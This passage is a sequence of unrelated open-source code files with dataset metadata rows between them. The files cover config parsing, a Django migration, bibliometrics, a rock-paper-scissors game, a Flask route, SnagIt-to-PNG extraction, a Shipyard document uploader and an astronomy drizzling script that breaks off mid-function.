elif stringSplit[0].strip().lower() == 'VALIDATION_GRID_WS'.lower():
self.validation_grid_ws= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VALIDATION_GRID_HS'.lower():
self.validation_grid_hs= float(stringSplit[1].strip())
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 038 : No value for ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
fid.close()
def readoptions(filename):
logging.info(': Reading Configuration File')
options = readOptions(filename)
logging.info(': Finished reading Configuration File')
return options
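# --- Usage sketch (illustrative only; not part of the original module) ---
# The parser above consumes "KEYWORD : VALUE" lines plus <BEGIN_X>/<END_X>
# blocks. Assuming a hypothetical config file such as:
#
#   YMAX : 10.0
#   FIGURE_COLOR : [0.9,0.9,0.9]
#   <BEGIN_FILES_LIST>
#   station_A.dat
#   <END_FILES_LIST>
#
# the options object would then expose the parsed values:
#
#   options = readoptions('config.dat')
#   print(options.Ymax, options.figurecolor, options.files_list)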
| 50.625698
| 174
| 0.454271
|
4a18973d24465418c7eba8b7ea12522654838819
| 439
|
py
|
Python
|
api/tacticalrmm/core/migrations/0033_coresettings_mesh_disable_auto_login.py
|
v2cloud/tacticalrmm
|
12f599f9749985f66ff9b559c5e5abd36064b182
|
[
"MIT"
] | null | null | null |
api/tacticalrmm/core/migrations/0033_coresettings_mesh_disable_auto_login.py
|
v2cloud/tacticalrmm
|
12f599f9749985f66ff9b559c5e5abd36064b182
|
[
"MIT"
] | null | null | null |
api/tacticalrmm/core/migrations/0033_coresettings_mesh_disable_auto_login.py
|
v2cloud/tacticalrmm
|
12f599f9749985f66ff9b559c5e5abd36064b182
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.3 on 2022-04-12 18:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0032_alter_coresettings_email_alert_recipients_and_more'),
]
operations = [
migrations.AddField(
model_name='coresettings',
name='mesh_disable_auto_login',
field=models.BooleanField(default=False),
),
]
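# Usage note (hedged; not part of the migration itself): once applied with
# `python manage.py migrate core`, the flag defaults to False and could be read as
#   CoreSettings.objects.first().mesh_disable_auto_login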
| 23.105263
| 76
| 0.646925
|
4a18977a9dbb5b6d81e5a517facc9cdb3331e7d3
| 1,243
|
py
|
Python
|
techminer2/thematic_map_communities.py
|
jdvelasq/techminer-api
|
d2bb7d20c326f2fe7cc06d7005dfb3f2053ea1da
|
[
"MIT"
] | null | null | null |
techminer2/thematic_map_communities.py
|
jdvelasq/techminer-api
|
d2bb7d20c326f2fe7cc06d7005dfb3f2053ea1da
|
[
"MIT"
] | null | null | null |
techminer2/thematic_map_communities.py
|
jdvelasq/techminer-api
|
d2bb7d20c326f2fe7cc06d7005dfb3f2053ea1da
|
[
"MIT"
] | null | null | null |
"""
Thematic Map / Communities
===============================================================================
>>> from techminer2 import *
>>> directory = "/workspaces/techminer2/data/"
>>> thematic_map_communities(
... 'author_keywords',
... min_occ=4,
... directory=directory,
... ).head()
cluster CLUST_0 ... CLUST_4
rn ...
0 fintech 139:1285 ... block-chain 017:0149
1 innovating 013:0249 ... cryptocurrencies 008:0036
2 bank 012:0185 ... smart contract 004:0018
3 regulating 011:0084 ... bitcoin 003:0007
4 financial service 011:0300 ...
<BLANKLINE>
[5 rows x 5 columns]
"""
from .co_occurrence_network_communities import co_occurrence_network_communities
def thematic_map_communities(
column,
min_occ=2,
directory="./",
):
return co_occurrence_network_communities(
column=column,
min_occ=min_occ,
max_occ=None,
normalization="association",
clustering_method="louvain",
manifold_method=None,
directory=directory,
)
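# Design note (hedged reading of the code above): thematic_map_communities is a
# thin preset over co_occurrence_network_communities, pinning "association"
# normalization and Louvain clustering so callers only choose the column and
# min_occ, e.g.
#   thematic_map_communities('author_keywords', min_occ=4, directory=directory)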
| 28.906977
| 80
| 0.513274
|
4a1899f900f5f1acf415fb1945bb8a8884a3da3b
| 2,307
|
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/rock_paper_scissors.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 71
|
2019-03-05T04:44:48.000Z
|
2022-03-24T09:47:48.000Z
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/rock_paper_scissors.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 8
|
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
cs/lambda_cs/01_intro_python/Intro-Python-II/examples/rock_paper_scissors.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 37
|
2019-03-07T05:08:03.000Z
|
2022-01-05T11:32:51.000Z
|
# import the module we need
import random
#file i/o functions for historical results
def load_results():
text_file = open("history.txt", "r")
history = text_file.read().split(",")
text_file.close()
return history
def save_results( w, t, l):
text_file = open("history.txt", "w")
text_file.write( str(w) + "," + str(t) + "," + str(l))
text_file.close()
#welcome message
results = load_results()
wins = int(results[0])
ties = int( results[1])
losses = int(results[2])
print("Welcome to Rock, Paper, Scissors!")
print("Wins: %s, Ties: %s, Losses: %s" % (wins, ties, losses))
print("Please choose to continue...")
#initialize user, computer choices
computer = random.randint(1,3)
user = int(input("[1] Rock [2] Paper [3] Scissors [9] Quit\n"))
# gameplay loop
while not user == 9:
#user chooses ROCK
if user == 1:
if computer == 1:
print("Computer chose rock...tie!")
ties += 1
elif computer == 2:
print("Computer chose paper...computer wins :(")
losses += 1
else:
print("Computer chose scissors...you wins :)")
wins += 1
#user chooses PAPER
elif user == 2:
if computer == 1:
print("Computer chose rock...you win :)")
wins += 1
elif computer == 2:
print("Computer chose paper...tie!")
ties += 1
else:
print("Computer chose scissors...computer wins :(")
losses += 1
#user chooses SCISSORS
elif user == 3:
if computer == 1:
print("Computer chose rock...computer wins :(")
losses += 1
elif computer == 2:
print("Computer chose paper...you win :)")
wins += 1
else:
print("Computer chose scissors...tie!")
ties += 1
else:
print("Invalid selection. Please try again.")
#print updated stats
print("Wins: %s, Ties: %s, Losses: %s" % (wins, ties, losses))
#prompt user to make another selection
print("Please choose to continue...")
#initialize user, computer choices
computer = random.randint(1,3)
user = int(input("[1] Rock [2] Paper [3] Scissors [9] Quit\n"))
# game over, save results
save_results(wins, ties, losses)
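# --- Alternative outcome logic (a minimal sketch, not part of the original game) ---
# The three if/elif branches above repeat the same win/tie/lose pattern shifted
# by one choice. With 1=rock, 2=paper, 3=scissors, the result reduces to modular
# arithmetic: (user - computer) % 3 is 0 for a tie, 1 for a user win, 2 for a loss.
def outcome(user_choice, computer_choice):
    """Return 'tie', 'win' or 'lose' from the player's perspective."""
    return ('tie', 'win', 'lose')[(user_choice - computer_choice) % 3]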
| 29.202532
| 73
| 0.563069
|
4a189aca08c61354ecc310501a4b7b8d459d7dac
| 381
|
py
|
Python
|
ores/wsgi/routes/v1/__init__.py
|
wikimedia/mediawiki-services-ores
|
13be375f9aef4f90a3f8b82bd68812ca69c8dad1
|
[
"MIT"
] | null | null | null |
ores/wsgi/routes/v1/__init__.py
|
wikimedia/mediawiki-services-ores
|
13be375f9aef4f90a3f8b82bd68812ca69c8dad1
|
[
"MIT"
] | null | null | null |
ores/wsgi/routes/v1/__init__.py
|
wikimedia/mediawiki-services-ores
|
13be375f9aef4f90a3f8b82bd68812ca69c8dad1
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import scores
from . import spec
def configure(config, bp, score_processor):
@bp.route("/v1/", methods=["GET"])
def v1_index():
return render_template("swagger-ui.html", swagger_spec="/v1/spec/")
bp = scores.configure(config, bp, score_processor)
bp = spec.configure(config, bp, score_processor)
return bp
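# --- Usage sketch (hedged: the app/blueprint names below are illustrative) ---
# configure() decorates an existing Flask Blueprint and returns it, so a host
# application would wire it up roughly like this:
#
#   from flask import Flask, Blueprint
#   app = Flask(__name__)
#   bp = configure(config, Blueprint("ores", __name__), score_processor)
#   app.register_blueprint(bp)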
| 22.411765
| 75
| 0.690289
|
4a189ad44181841cd06d70e2791a0849241842ce
| 3,801
|
py
|
Python
|
snagittopng.py
|
ravisayal/SnagItToPNG
|
16df7f68e62b07b0dd05f1a8cb819dc0a98640fa
|
[
"MIT"
] | null | null | null |
snagittopng.py
|
ravisayal/SnagItToPNG
|
16df7f68e62b07b0dd05f1a8cb819dc0a98640fa
|
[
"MIT"
] | null | null | null |
snagittopng.py
|
ravisayal/SnagItToPNG
|
16df7f68e62b07b0dd05f1a8cb819dc0a98640fa
|
[
"MIT"
] | null | null | null |
# Converts the SNAGIT raw capture to PNG
# this does not copy the SNAG IT annotations
# use SNAGIT Batch conversion tool to convert with Annotations
import os
import time
import datetime
from ctypes import create_unicode_buffer, windll, wintypes, byref
from bitstring import ConstBitStream
# get the file creation date/time
def get_ctime(filepath, verbose="n"):
if verbose == "y":
print ("filepath: " + filepath)
created = os.path.getctime(filepath)
return created
# get the file last modified date/time
def get_mtime(filepath, verbose="n"):
if verbose == "y":
print ("filepath: " + filepath)
modified = os.path.getmtime(filepath)
return modified
# update file creation date/time
def update_ctime(filepath, epoch, verbose="n"):
if verbose == "y":
print (filepath + " updating create time to: " + epoch)
# Convert Unix timestamp to Windows FileTime using some magic numbers
# See documentation: https://support.microsoft.com/en-us/help/167296
timestamp = int((epoch * 10000000) + 116444736000000000)
ctime = wintypes.FILETIME(timestamp & 0xFFFFFFFF, timestamp >> 32)
# Call Win32 API to modify the file creation date
handle = windll.kernel32.CreateFileW(filepath, 256, 0, None, 3, 128, None)
windll.kernel32.SetFileTime(handle, byref(ctime), None, None)
windll.kernel32.CloseHandle(handle)
if verbose == "y":
print("file create date updated")
# update file last modified date/time
def update_mtime(filepath, epoch, verbose="n"):
if verbose == "y":
print (filepath + " updating last modified time to: " + epoch)
os.utime(filepath, (epoch, epoch))
if verbose == "y":
print("file last modified date updated")
# SNAGIT Screenshot folder
Local_App_Data = os.environ['LOCALAPPDATA']
directory = Local_App_Data+r"\TechSmith\Snagit\DataStore" + "\\"
# Current Folder
# directory = ".\\"
for filename in os.listdir(directory):
if filename.endswith(".SNAG"):
filepath = directory + filename
file_create_date = get_ctime(filepath)
file_modified_date = get_mtime(filepath)
print("Processing %s %d %d" % (filepath,
file_create_date,
file_modified_date))
# initialise the bitstream from the filename
# (it can also be initialised from files, bytes, etc.)
s = ConstBitStream(filename=filepath)
# look for PNG Start and End Markers in SNAGIT File
# start marker: the PNG signature bytes \x89PNG (0x89504E47)
# end marker: 'END' plus the CRC bytes 0xAE426082, i.e. the tail of the IEND chunk
start = s.find('0x89504E47', bytealigned=True)
end = s.find('0x454E44AE426082', bytealigned=True)
assert start, "PNG Header not found"
assert end, "PNG Terminator not found"
start_off = int(start[0] / 8)
end_off = int(end[0] / 8)
# calculate content length, add 7 bytes to end-offset
# as it is starting location of PNG end marker
content_len = end_off - start_off + 7
# Now with correct start offset and content length
# read the file in binary mode and copy the content
# to new file
# File read operation start
file = open(filepath, "rb")
file.seek(start_off, 0)
pngdata = file.read(content_len)
file.close()
# File read operation end
# write the content to new file with png extension
filepath_dest = filepath + ".png"
destfile = open(filepath_dest, "wb")
destfile.write(pngdata)
destfile.close()
# update the file create and last modified date time
# to match original file
update_ctime(filepath_dest, file_create_date)
update_mtime(filepath_dest, file_modified_date)
else:
continue
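# --- Sanity-check sketch (illustrative; not part of the original script) ---
# A quick way to confirm the extracted bytes really form a PNG is to test the
# 8-byte signature at the start of the new file:
def looks_like_png(path):
    with open(path, "rb") as fh:
        return fh.read(8) == b"\x89PNG\r\n\x1a\n"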
| 31.413223
| 78
| 0.648777
|
4a189b2ffb7963aee34900403051e91660b7d404
| 7,053
|
py
|
Python
|
pegleg/engine/util/shipyard_helper.py
|
openstack/airship-pegleg
|
cbc87967ebd572463a893b03097b615b99d9dbcf
|
[
"Apache-2.0"
] | 9
|
2018-06-20T20:16:29.000Z
|
2019-03-24T23:07:25.000Z
|
pegleg/engine/util/shipyard_helper.py
|
openstack/airship-pegleg
|
cbc87967ebd572463a893b03097b615b99d9dbcf
|
[
"Apache-2.0"
] | 8
|
2020-11-16T16:22:58.000Z
|
2021-05-14T13:29:45.000Z
|
pegleg/engine/util/shipyard_helper.py
|
airshipit/pegle
|
772d3a47a6db425be8249f770a732dbad4e00b08
|
[
"Apache-2.0"
] | 2
|
2020-03-02T13:53:53.000Z
|
2021-07-19T05:02:13.000Z
|
# Copyright 2018 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import uuid
from shipyard_client.api_client.shipyard_api_client import ShipyardClient
from shipyard_client.api_client.shipyardclient_context import \
ShipyardClientContext
import yaml
from pegleg.engine import exceptions
from pegleg.engine import site
from pegleg.engine.util import files
from pegleg.engine.util.files import add_representer_ordered_dict
from pegleg.engine.util.pegleg_secret_management import PeglegSecretManagement
LOG = logging.getLogger(__name__)
class AuthValuesError(exceptions.PeglegBaseException):
"""Shipyard authentication failed. """
def __init__(self, *, diagnostic):
self.diagnostic = diagnostic
class DocumentUploadError(exceptions.PeglegBaseException):
"""Exception occurs while uploading documents"""
def __init__(self, message):
self.message = message
class ShipyardHelper(object):
"""
A helper class for Shipyard. It performs the following operation:
1. Validates the authentication parameters required for Keystone
2. Uploads the document to Shipyard buffer
3. Commits the document
4. Formats response from Shipyard api_client
"""
def __init__(self, context, buffer_mode='replace'):
"""
Initializes params to be used by Shipyard
:param context: ShipyardHelper context object that contains
params for initializing ShipyardClient with
correct client context and the site_name.
"""
self.ctx = context
self.api_parameters = self.ctx.obj['API_PARAMETERS']
self.auth_vars = self.api_parameters.get('auth_vars')
self.context_marker = self.ctx.obj['context_marker']
if self.context_marker is None:
self.context_marker = str(uuid.uuid4())
LOG.debug("context_marker is %s", self.context_marker)
self.site_name = self.ctx.obj['site_name']
self.client_context = ShipyardClientContext(
self.auth_vars, self.context_marker)
self.api_client = ShipyardClient(self.client_context)
self.buffer_mode = buffer_mode
self.collection = self.ctx.obj.get('collection', self.site_name)
def upload_documents(self):
"""Uploads documents to Shipyard"""
collected_documents = files.collect_files_by_repo(self.site_name)
collection_data = [site.get_deployment_data_doc(self.site_name)]
LOG.info("Processing %d collection(s)", len(collected_documents))
for idx, document in enumerate(collected_documents):
# Decrypt the documents if encrypted
pegleg_secret_mgmt = PeglegSecretManagement(
docs=collected_documents[document])
decrypted_documents = pegleg_secret_mgmt.get_decrypted_secrets()
collection_data.extend(decrypted_documents)
add_representer_ordered_dict()
collection_as_yaml = yaml.dump_all(
collection_data, Dumper=yaml.SafeDumper)
# Append flag is not required for the first
# collection being uploaded to Shipyard. It
# is needed for subsequent collections.
if self.buffer_mode in ['append', 'replace']:
buffer_mode = self.buffer_mode
else:
raise exceptions.InvalidBufferModeException()
try:
self.validate_auth_vars()
resp_text = self.api_client.post_configdocs(
collection_id=self.collection,
buffer_mode=buffer_mode,
document_data=collection_as_yaml)
except AuthValuesError as ave:
resp_text = "Error: {}".format(ave.diagnostic)
raise DocumentUploadError(resp_text)
except Exception as ex:
resp_text = (
"Error: Unable to invoke action due to: {}".format(str(ex)))
LOG.debug(resp_text, exc_info=True)
raise DocumentUploadError(resp_text)
# FIXME: Standardize status_code in Deckhand to avoid this
# workaround.
code = 0
if hasattr(resp_text, 'status_code'):
code = resp_text.status_code
elif hasattr(resp_text, 'code'):
code = resp_text.code
if code >= 400:
if hasattr(resp_text, 'content'):
raise DocumentUploadError(resp_text.content)
else:
raise DocumentUploadError(resp_text)
else:
output = self.formatted_response_handler(resp_text)
LOG.info("Uploaded document in buffer %s ", output)
# Commit in the last iteration of the loop when all the documents
# have been pushed to Shipyard buffer.
return self.commit_documents()
def commit_documents(self):
"""Commit Shipyard buffer documents """
LOG.info("Commiting Shipyard buffer documents")
try:
resp_text = self.formatted_response_handler(
self.api_client.commit_configdocs())
except Exception as ex:
resp_text = (
"Error: Unable to invoke action due to: {}".format(str(ex)))
raise DocumentUploadError(resp_text)
return resp_text
def validate_auth_vars(self):
"""Checks that the required authorization varible have been entered"""
required_auth_vars = ['auth_url']
err_txt = []
for var in required_auth_vars:
if self.auth_vars[var] is None:
err_txt.append(
'Missing the required authorization variable: '
'--os-{}'.format(var.replace('_', '-')))
if err_txt:
for var in self.auth_vars:
if (self.auth_vars.get(var) is None
and var not in required_auth_vars):
err_txt.append(
'- Also not set: --os-{}'.format(
var.replace('_', '-')))
raise AuthValuesError(diagnostic='\n'.join(err_txt))
def formatted_response_handler(self, response):
"""Base format handler for either json or yaml depending on call"""
call = response.headers['Content-Type']
if 'json' in call:
try:
return json.dumps(response.json(), indent=4)
except ValueError:
return (
"This is not json and could not be printed as such. \n"
+ response.text)
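# --- Usage sketch (hedged: the context object below is hypothetical; the real
# CLI builds ctx.obj from click options) ---
#
#   helper = ShipyardHelper(ctx)   # ctx.obj carries API_PARAMETERS, context_marker,
#   helper.upload_documents()      # site_name and (optionally) collection
#
# upload_documents() decrypts and concatenates the site documents, posts them to
# the Shipyard buffer, and finishes by committing the buffer in one call.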
| 39.623596
| 78
| 0.648093
|
4a189be46a31d057bf2d9d78522d3a9377d60cf1
| 31,953
|
py
|
Python
|
grizli/aws/aws_drizzler.py
|
zhangxinnaoc/grizli
|
2d9f5f838db6ff0992d9731c399729e9e7dcfe83
|
[
"MIT"
] | 1
|
2019-12-23T02:07:20.000Z
|
2019-12-23T02:07:20.000Z
|
grizli/aws/aws_drizzler.py
|
zhangxinnaoc/grizli
|
2d9f5f838db6ff0992d9731c399729e9e7dcfe83
|
[
"MIT"
] | null | null | null |
grizli/aws/aws_drizzler.py
|
zhangxinnaoc/grizli
|
2d9f5f838db6ff0992d9731c399729e9e7dcfe83
|
[
"MIT"
] | null | null | null |
#!/bin/env python
import inspect
def make_visit_fits():
import glob
import os
import numpy as np
from grizli import utils
visit_files = glob.glob('[egu]*visits.npy')
visit_files.sort()
all_visits = []
products = []
for file in visit_files:
visits, groups, info = np.load(file)
for v in visits:
has_fp = ('footprints' in v)
if not has_fp:
print('No footprint: {0}'.format(v['product']))
if has_fp & (v['product'] not in products):
all_visits.append(v)
products.append(v['product'])
# WFC3/IR copied to "Exposures" paths
for visit in all_visits:
visit['filter'] = visit['product'].split('-')[-1]
for v in all_visits:
if v['filter'].startswith('f0') | v['filter'].startswith('f1'):
#print(v['product'])
v['awspath'] = ['grizli-v1/Exposures/{0}/{1}'.format(f[:4], f.split('_')[0]) for f in v['files']]
tab = utils.GTable()
for k in ['product', 'filter']:
tab[k] = [visit[k] for visit in all_visits]
coo = np.array([np.array(visit['footprint'].centroid.xy).flatten() for visit in all_visits])
tab['ra'] = coo[:,0]
tab['dec'] = coo[:,1]
tab['nexp'] = [len(visit['files']) for visit in all_visits]
root = 'candels-july2019'
root = 'candels-sep2019'
tab.write(root+'_visits.fits', overwrite=True)
np.save(root+'_visits.npy', [all_visits])
os.system('echo "# In https://s3.amazonaws.com/grizli-v1/Mosaics/" > candels-july2019.files.txt; ls candels-july2019* |grep -v files.txt >> candels-july2019.files.txt')
os.system('aws s3 sync --exclude "*" --include "candels-july2019*" ./ s3://grizli-v1/Mosaics/ --acl public-read')
def group_by_filter():
"""
aws s3 sync --exclude "*" --include "cosmos_visits*" s3://grizli-preprocess/CosmosMosaic/ ./
"""
from grizli import prep, utils
import numpy as np
master='cosmos'
master='grizli-jan2019'
tab = utils.read_catalog('{0}_visits.fits'.format(master))
all_visits = np.load('{0}_visits.npy'.format(master), allow_pickle=True)[0]
# By filter
# Exclude DASH
dash = utils.column_string_operation(tab['product'], 'icxe', 'startswith')
# Don't exclude DASH
dash = utils.column_string_operation(tab['product'], 'xxxx', 'startswith')
groups = {}
fpstr = {}
for filt in np.unique(tab['filter']):
mat = (tab['filter'] == filt) & (~dash)
groups[filt] = {'filter':filt, 'files':[], 'awspath':[], 'footprints':[]}
fpstr[filt] = 'fk5\n'
for ix in np.where(mat)[0]:
fp = all_visits[ix]['footprint']
if hasattr(fp, '__len__'):
fps = fp
else:
fps = [fp]
for fp in fps:
xy = fp.boundary.xy
pstr = 'polygon('+','.join(['{0:.6f}'.format(i) for i in np.array([xy[0].tolist(), xy[1].tolist()]).T.flatten()])+') # text={{{0}}}\n'.format(all_visits[ix]['product'])
fpstr[filt] += pstr
for k in ['files', 'awspath','footprints']:
groups[filt][k].extend(all_visits[ix][k])
fp = open('{0}-pointings-{1}.reg'.format(master, filt),'w')
fp.write(fpstr[filt])
fp.close()
print('{0:6} {1:>3d} {2:>4d} ({3:>4d})'.format(filt, mat.sum(), len(groups[filt]['files']), len(np.unique(groups[filt]['files']))))
np.save('{0}_filter_groups.npy'.format(master), [groups])
# RGB_PARAMS = {'xsize':4, 'rgb_min':-0.01, 'verbose':True, 'output_dpi': None, 'add_labels':False, 'output_format':'png', 'show_ir':False, 'scl':2, 'suffix':'.rgb', 'mask_empty':False}
RGB_PARAMS = {'xsize':4,
'output_dpi': None,
'rgb_min':-0.01,
'add_labels':False,
'output_format':'png',
'show_ir':False,
'scl':2,
'suffix':'.rgb',
'mask_empty':False,
'tick_interval':1,
'pl':1, # 1 for f_lambda, 2 for f_nu
}
#xsize=4, output_dpi=None, HOME_PATH=None, show_ir=False, pl=1, pf=1, scl=1, rgb_scl=[1, 1, 1], ds9=None, force_ir=False, filters=all_filters, add_labels=False, output_format='png', rgb_min=-0.01, xyslice=None, pure_sort=False, verbose=True, force_rgb=None, suffix='.rgb', scale_ab=scale_ab)
def segmentation_figure(label, cat, segfile):
"""
Make a figure showing a cutout of the segmentation file
"""
import matplotlib.pyplot as plt
import numpy as np
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
from grizli import utils
plt.ioff()
seg = pyfits.open(segfile)
seg_data = seg[0].data
seg_wcs = pywcs.WCS(seg[0].header)
# Randomize seg to get dispersion between neighboring objects
np.random.seed(hash(label.split('_')[0]) % (10 ** 8))
rnd_ids = np.append([0], np.argsort(np.random.rand(len(cat)))+1)
# Make cutout
th = pyfits.open('{0}.thumb.fits'.format(label), mode='update')
th_wcs = pywcs.WCS(th[0].header)
blot_seg = utils.blot_nearest_exact(seg_data, seg_wcs, th_wcs,
stepsize=-1, scale_by_pixel_area=False)
rnd_seg = rnd_ids[np.cast[int](blot_seg)]*1.
th_ids = np.unique(blot_seg)
sh = th[0].data.shape
yp, xp = np.indices(sh)
thumb_height = 2.
fig = plt.figure(figsize=[thumb_height*sh[1]/sh[0], thumb_height])
ax = fig.add_subplot(111)
rnd_seg[rnd_seg == 0] = np.nan
ax.imshow(rnd_seg, aspect='equal', cmap='terrain_r',
vmin=-0.05*len(cat), vmax=1.05*len(cat))
ax.set_xticklabels([])
ax.set_yticklabels([])
ix = utils.column_values_in_list(cat['number'], th_ids)
xc, yc = th_wcs.all_world2pix(cat['ra'][ix], cat['dec'][ix], 0)
xc = np.clip(xc, 0.09*sh[1], 0.91*sh[1])
yc = np.clip(yc, 0.08*sh[0], 0.92*sh[0])
for th_id, x_i, y_i in zip(cat['number'][ix], xc, yc):
if th_id == 0:
continue
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='w')
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='k', alpha=0.95)
ax.set_xlim(0, sh[1]-1)
ax.set_ylim(0, sh[0]-1)
ax.set_axis_off()
fig.tight_layout(pad=0.01)
fig.savefig('{0}.seg.png'.format(label))
plt.close(fig)
# Append to thumbs file
seg_hdu = pyfits.ImageHDU(data=np.cast[int](blot_seg), name='SEG')
if 'SEG' in th:
th.pop('SEG')
th.append(seg_hdu)
th.writeto('{0}.thumb.fits'.format(label), overwrite=True,
output_verify='fix')
th.close()
def drizzle_images(label='macs0647-jd1', ra=101.9822125, dec=70.24326667, pixscale=0.1, size=10, wcs=None, pixfrac=0.33, kernel='square', theta=0, half_optical_pixscale=True, filters=['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m', 'f850lp', 'f814w', 'f775w', 'f606w', 'f475w', 'f555w', 'f600lp', 'f390w', 'f350lp'], remove=True, rgb_params=RGB_PARAMS, master='grizli-jan2019', aws_bucket='s3://grizli/CutoutProducts/', scale_ab=21, thumb_height=2.0, sync_fits=True, subtract_median=True, include_saturated=True, include_ir_psf=False, show_filters=['visb', 'visr', 'y', 'j', 'h'], combine_similar_filters=True, single_output=True, aws_prep_dir=None, make_segmentation_figure=False, get_dict=False, **kwargs):
"""
label='cp561356'; ra=150.208875; dec=1.850241667; size=40; filters=['f160w','f814w', 'f140w','f125w','f105w','f606w','f475w']
"""
import glob
import copy
import os
import numpy as np
import astropy.io.fits as pyfits
from astropy.coordinates import SkyCoord
import astropy.units as u
from drizzlepac.adrizzle import do_driz
import boto3
from grizli import prep, utils
from grizli.pipeline import auto_script
# Function arguments
if get_dict:
frame = inspect.currentframe()
args = inspect.getargvalues(frame).locals
pop_args = ['get_dict', 'frame', 'kwargs']
pop_classes = (np.__class__, do_driz.__class__, SkyCoord.__class__)
for k in kwargs:
args[k] = kwargs[k]
for k in args:
if isinstance(args[k], pop_classes):
pop_args.append(k)
for k in pop_args:
if k in args:
args.pop(k)
return args
# Boto objects
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
if isinstance(ra, str):
coo = SkyCoord('{0} {1}'.format(ra, dec), unit=(u.hour, u.deg))
ra, dec = coo.ra.value, coo.dec.value
if label is None:
try:
import mastquery.utils
label = mastquery.utils.radec_to_targname(ra=ra, dec=dec, round_arcsec=(1/15, 1), targstr='j{rah}{ram}{ras}{sign}{ded}{dem}{des}')
except:
label = 'grizli-cutout'
#master = 'cosmos'
#master = 'grizli-jan2019'
if master == 'grizli-jan2019':
parent = 's3://grizli/MosaicTools/'
bkt = s3.Bucket('grizli')
elif master == 'cosmos':
parent = 's3://grizli-preprocess/CosmosMosaic/'
bkt = s3.Bucket('grizli-preprocess')
elif master == 'grizli-cosmos-v2':
parent = 's3://grizli-cosmos-v2/Mosaics/'
bkt = s3.Bucket('grizli-cosmos-v2')
elif master == 'candels-july2019':
parent = 's3://grizli-v1/Mosaics/'
bkt = s3.Bucket('grizli-v1')
else:
# Run on local files, e.g., "Prep" directory
parent = None
#remove = False
for ext in ['_visits.fits', '_visits.npy', '_filter_groups.npy'][-1:]:
if (not os.path.exists('{0}{1}'.format(master, ext))) & (parent is not None):
s3_path = parent.split('/')[-2]
s3_file = '{0}{1}'.format(master, ext)
print('{0}{1}'.format(parent, s3_file))
bkt.download_file(s3_path+'/'+s3_file, s3_file,
ExtraArgs={"RequestPayer": "requester"})
#os.system('aws s3 cp {0}{1}{2} ./'.format(parent, master, ext))
#tab = utils.read_catalog('{0}_visits.fits'.format(master))
#all_visits = np.load('{0}_visits.npy'.format(master))[0]
if parent is not None:
groups = np.load('{0}_filter_groups.npy'.format(master), allow_pickle=True)[0]
else:
if aws_prep_dir is not None:
spl = aws_prep_dir.replace('s3://','').split('/')
prep_bucket = spl[0]
prep_root = spl[2]
prep_bkt = s3.Bucket(prep_bucket)
s3_prep_path = 'Pipeline/{0}/Prep/'.format(prep_root)
s3_full_path = '{0}/{1}'.format(prep_bucket, s3_prep_path)
s3_file = '{0}_visits.npy'.format(prep_root)
# Make output path Prep/../Thumbnails/
if aws_bucket is not None:
aws_bucket = 's3://'+s3_full_path.replace('/Prep/', '/Thumbnails/')
print('{0}{1}'.format(s3_prep_path, s3_file))
if not os.path.exists(s3_file):
prep_bkt.download_file(os.path.join(s3_prep_path, s3_file),
s3_file, ExtraArgs={"RequestPayer": "requester"})
groups_files = glob.glob('{0}_filter_groups.npy'.format(prep_root))
visit_query = prep_root+'_'
else:
groups_files = glob.glob('*filter_groups.npy')
visit_query = '*'
# Reformat local visits.npy into a groups file
if (len(groups_files) == 0):
visit_file = glob.glob(visit_query+'visits.npy')[0]
visits, groups, info = np.load(visit_file, allow_pickle=True)
visit_root = visit_file.split('_visits')[0]
visit_filters = np.array([v['product'].split('-')[-1] for v in visits])
groups = {}
for filt in np.unique(visit_filters):
groups[filt] = {}
groups[filt]['filter'] = filt
groups[filt]['files'] = []
groups[filt]['footprints'] = []
groups[filt]['awspath'] = []
ix = np.where(visit_filters == filt)[0]
for i in ix:
groups[filt]['files'].extend(visits[i]['files'])
groups[filt]['footprints'].extend(visits[i]['footprints'])
Nf = len(groups[filt]['files'])
print('{0:>6}: {1:>3} exposures'.format(filt, Nf))
if aws_prep_dir is not None:
groups[filt]['awspath'] = [s3_full_path
for file in range(Nf)]
np.save('{0}_filter_groups.npy'.format(visit_root), [groups])
else:
groups = np.load(groups_files[0], allow_pickle=True)[0]
#filters = ['f160w','f814w', 'f110w', 'f098m', 'f140w','f125w','f105w','f606w', 'f475w']
has_filts = []
lower_filters = [f.lower() for f in filters]
for filt in lower_filters:
if filt not in groups:
continue
visits = [copy.deepcopy(groups[filt])]
#visits[0]['reference'] = 'CarlosGG/ak03_j1000p0228/Prep/ak03_j1000p0228-f160w_drz_sci.fits'
visits[0]['product'] = label+'-'+filt
if wcs is None:
hdu = utils.make_wcsheader(ra=ra, dec=dec, size=size, pixscale=pixscale, get_hdu=True, theta=theta)
h = hdu.header
else:
h = utils.to_header(wcs)
if (filt[:2] in ['f0', 'f1', 'g1']) | (not half_optical_pixscale):
#data = hdu.data
pass
else:
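# Note (explanatory comment, not original): optical (non-IR) filters get half
# the requested pixel scale. Doubling NAXIS/CRPIX while halving the CD matrix
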